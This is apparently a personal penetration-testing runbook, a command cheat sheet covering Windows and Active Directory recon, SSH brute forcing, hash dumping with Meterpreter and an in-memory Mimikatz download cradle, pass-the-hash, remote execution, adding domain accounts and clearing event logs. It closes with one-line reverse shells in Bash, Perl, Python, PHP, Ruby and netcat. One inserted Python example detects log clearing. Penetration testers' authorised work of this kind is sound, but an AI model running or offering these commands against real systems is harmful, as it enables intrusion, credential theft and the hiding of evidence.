This is a rough copy of a runbook I am building for penetration testing. Still in progress. For suggestions, please contact me.
Windows
Recon
nmap -sS -O -p1-65535 --script banner 192.168.1.1/24 - SYN scan of all ports with OS detection and banner grab
nmap -sT -sU -sV -O -p1-65535 --script banner 192.168.1.1/24 - TCP full-connect scan + UDP scan + service version + OS detection + banner grab of all ports (slow)
nmap -sn -n -T4 192.168.1.1/24 - Ping scan with no DNS resolution
nmap -Pn -sS -T4 -sV -O --reason -oA filename 192.168.1.1/24 - Port scan all hosts without pinging first + OS detection + service version + output in all formats + reason for each port state
FOR /L %x in (1,1,255) do ping -n 1 192.168.2.%x | find /I "reply" >> c:\temp\pingresult.txt - Ping scan from the Windows command line (matching on "TTL=" instead of "reply" avoids counting "Destination host unreachable" replies as live hosts)
1..255 | foreach-object { (new-object System.Net.NetworkInformation.Ping).Send("192.168.2.$_") } | where-object {$_.Status -eq "Success"} | select Address - Ping scan with Windows PowerShell
Brute Force
ncrack -u user -P password_list.txt -p ssh 192.168.1.1 - Run an SSH brute force
Enumeration
enum4linux - Portcullis Labs
Plundering Windows Account Info via Authenticated SMB Sessions - Sans Penetration Testing
SQL
Hunting MySQL - Metasploit Unleashed
Admin-mssql-auxiliary-modules - Metasploit Unleashed
Attacking mssql with Metasploit - Darkoperator
Attacking MySQL with Metasploit - Pentestlab
Capture
Responder 2.0 - Owning Windows Networks part 2 - SpiderLabs
Responder 2.0 - Owning Windows Networks part 3 - SpiderLabs
Vulnerability Analysis
nmap --script smb-check-vulns.nse --script-args=unsafe=1 -p445 (host) - Check for MS08-067 and other SMB vulnerabilities (unsafe=1 runs checks that can crash the target; newer Nmap releases replaced this script with the smb-vuln-* scripts)
Privilege escalation
meterpreter> getuid - Display the user that the Meterpreter server is running as on the host
whoami - Windows or Linux: check the current user
whoami /groups - Windows: check integrity level and group membership
id - Linux: check the groups and permissions of the current user
meterpreter> run post/windows/gather/win_privs - Prints whether UAC is enabled and whether the current account is admin-enabled. Also prints the UID, foreground session ID, SYSTEM status and current process privileges
meterpreter> getsystem - Attempt to get SYSTEM privileges on the host
Dumping hashes
Windows
meterpreter> run post/windows/gather/hashdump - Dump the local user accounts from the SAM database via the registry
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<invoke-mimikatz>'); Invoke-Mimikatz -DumpCreds" - Run Invoke-Mimikatz in memory with a PowerShell web cradle. Any additional arguments go at the end of the command
meterpreter> run post/windows/gather/credentials/domain_hashdump - Dump hashes from a domain controller safely
Windows
Windows Privilege Escalation Fundamentals - FuzzySecurity
UAC what penetration testers should know - Cobalt Strike blog
windows-privesc-check - PentestMonkeys
Veil-Powerup usage guide - Harmj0y
Windows Exploit Suggester - GDSSecurity
Metasploit local exploit suggester - Metasploit
pinjector - Tarasco
Linux
Unix & Linux password cracking - Nixcraft
Basic Linux Privilege Escalation - g0tmi1k
Unix-privesc-check - Pentestmonkeys
LinEnum - rebootuser
Linuxprivchecker - rebootuser
Exploiting SUID executables - Pentestpartners
Post Exploitation
post/windows/recon/computer_browser_discovery - Uses railgun to discover hostnames and IPs on the network
post/windows/gather/arp_scanner - Scan the network without pinging hosts
post/windows/gather/cachedump - Dump cached domain credentials
post/windows/gather/checkvm - Check whether the host is a VM
post/windows/gather/credentials/gpp - Pulls passwords out of Group Policy Preferences
post/windows/gather/credentials/tortoisesvn - Windows admins use this for SVN; pulls stored credentials
post/windows/gather/credentials/winscp - Secure copy client; pulls stored passwords
post/windows/gather/dnscache_dump - See which sites users have visited
post/windows/gather/enum_applications - Finds applications installed on the computer
post/windows/gather/enum_chrome / enum_ie / enum_firefox - Enumerates browser data from Chrome, IE and Firefox
post/windows/gather/enum_termserv - Shows which hosts this box has connected to over RDP
post/windows/gather/enum_unattend - Unattended install files often contain credentials
post/windows/manage/inject_ca - Injects a certificate authority into the box
post/windows/manage/remove_ca - Removes a certificate authority to lift restrictions
post/windows/wlan/wlan_profile - Dumps Wi-Fi passwords in clear text on Windows 7 and above
post/windows/gather/enum_tokens - Identifies systems that have a Domain Admin (delegation) token on them
A portion of the above list is from the Metasploit Minute video here
Active Directory
post/windows/gather/enum_ad_computers - Find computers on the domain; very stealthy
post/windows/gather/enum_ad_service_principal_names - Find SQL servers and other hosts running registered services
post/windows/gather/enum_ad_user_comments - User comment fields sometimes contain passwords
net view /domain - List domains visible from this host
net view /domain:(domain) - List hosts in the domain. Same as network neighborhood
net group /domain "Domain Computers" - List all domain computer accounts
net view \\(computername) - List shares on a computer
net user /domain - List all users in the domain
net group /domain - List all groups in the domain
net group /domain "group name" - List users in a domain group
net user /domain "user" - List information about a domain user, including group membership
nltest /dclist:(domain) - List all domain controllers in the domain
nltest /domain_trusts - Map domain trusts
net localgroup /domain "administrators" - List members of the Administrators group on the domain controller
net user username password /ADD - Add a local user account
net user username password /ADD /DOMAIN - Add a new user account to the domain
wmic useraccount - List all local accounts with their SIDs
Get-ADUser -Filter * -Properties SamAccountName,Description | Select-Object SamAccountName,Description - Get account descriptions from AD to look for passwords stored in them. Works from any domain user
Running DLL
rundll32.exe dllname.dll,StartW
File exploring
dir /S /B - Directory walk on Windows
Passing shells
meterpreter> run post/windows/manage/payload_inject - Create a new shell on a box you already own (two is one and one is none). Can also be used to hand a session to another user
Lateral Movement
dir \\host\c$ - Check whether you are an admin on another computer by listing its c$ share
runas /user:Domain\(user) something.exe - Create a token with credentials from the command line
runas /user:Domain\(user) /netonly something.exe - Create a token that only uses the credentials for network access
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND - Pass the hash with Mimikatz
SCHTASKS /Run /S system /U user /P password /I /TN "taskname" - Run a task immediately on a remote system
wmic /node:(host) process call create (path to exe) - Run an exe on a remote computer with WMIC
powershell Invoke-Command -ComputerName (host) -ScriptBlock { dir c:\ } - Run a command with Windows Remoting. WinRM (port 5985) is turned off by default (turned on for administration)
Cleaning up
meterpreter> clearev - Clears the Application, System and Security logs on a Windows system. There are no options or arguments
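From the defender's side, clearing those three logs is itself loud: Windows writes Event ID 1102 to the Security log when it is cleared and Event ID 104 to the System log when the System or Application log is cleared. The following is an added example (not part of the runbook) that parses constructed event records in a made-up key=value export format and flags both single clears and the all-three-logs burst that clearev produces.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample export: one event per line as key=value pairs. "ClearedLog" is an
# assumed field name for the log named in the 104 event data; it is not a real EVTX field.
SAMPLE_EVENTS = """
Channel=Security EventID=4624 TimeCreated=2024-01-10T09:00:01Z SubjectUserName=alice Computer=WS01
Channel=Security EventID=1102 TimeCreated=2024-01-10T09:05:44Z SubjectUserName=SYSTEM Computer=WS01
Channel=System EventID=104 TimeCreated=2024-01-10T09:05:45Z SubjectUserName=SYSTEM Computer=WS01 ClearedLog=Application
Channel=System EventID=104 TimeCreated=2024-01-10T09:05:45Z SubjectUserName=SYSTEM Computer=WS01 ClearedLog=System
Channel=Security EventID=4688 TimeCreated=2024-01-10T09:06:00Z SubjectUserName=alice Computer=WS02
"""

# (Channel, EventID) pairs that mean "a log was cleared". 1102 always refers to the
# Security log; 104 names the cleared log in its event data.
CLEAR_EVENTS = {("Security", "1102"): "Security", ("System", "104"): None}

def parse_events(text: str) -> List[Dict[str, str]]:
    """Turn the constructed key=value lines into dicts."""
    return [dict(re.findall(r"(\w+)=(\S+)", line)) for line in text.strip().splitlines()]

def find_log_clears(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one alert per cleared log: which log, on which host, by whom, when."""
    alerts = []
    for e in events:
        key = (e.get("Channel"), e.get("EventID"))
        if key not in CLEAR_EVENTS:
            continue
        alerts.append({
            "computer": e["Computer"],
            "log": CLEAR_EVENTS[key] or e.get("ClearedLog", "unknown"),
            "user": e.get("SubjectUserName", "?"),
            "time": datetime.strptime(e["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ"),
        })
    return alerts

def clearev_bursts(alerts: List[Dict[str, object]], window: timedelta = timedelta(seconds=60)) -> List[str]:
    """Hosts where Application, System and Security were all cleared within one window."""
    by_host: Dict[str, list] = {}
    for a in alerts:
        by_host.setdefault(a["computer"], []).append(a)
    hits = []
    for host, items in by_host.items():
        items.sort(key=lambda a: a["time"])
        for i, first in enumerate(items):
            logs = {a["log"] for a in items[i:] if a["time"] - first["time"] <= window}
            if {"Application", "System", "Security"} <= logs:
                hits.append(host)
                break
    return hits

if __name__ == "__main__":
    found = find_log_clears(parse_events(SAMPLE_EVENTS))
    for a in found:
        print(f'{a["time"]} {a["computer"]}: {a["log"]} log cleared by {a["user"]}')
    print("clearev-style bursts on:", clearev_bursts(found))
```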
Reverse Shells
Bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Python pseudo-terminal
python -c "import pty;pty.spawn('/bin/bash')" - Use this to upgrade a raw shell
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat Linux
nc -e /bin/sh 10.0.0.1 1234
Netcat Windows
nc 10.10.0.1 1234 -e cmd.exe
References
Reverse shell cheat sheet - Pentestmonkeys
Netcat cheat sheet v1 - Sans Penetration Testing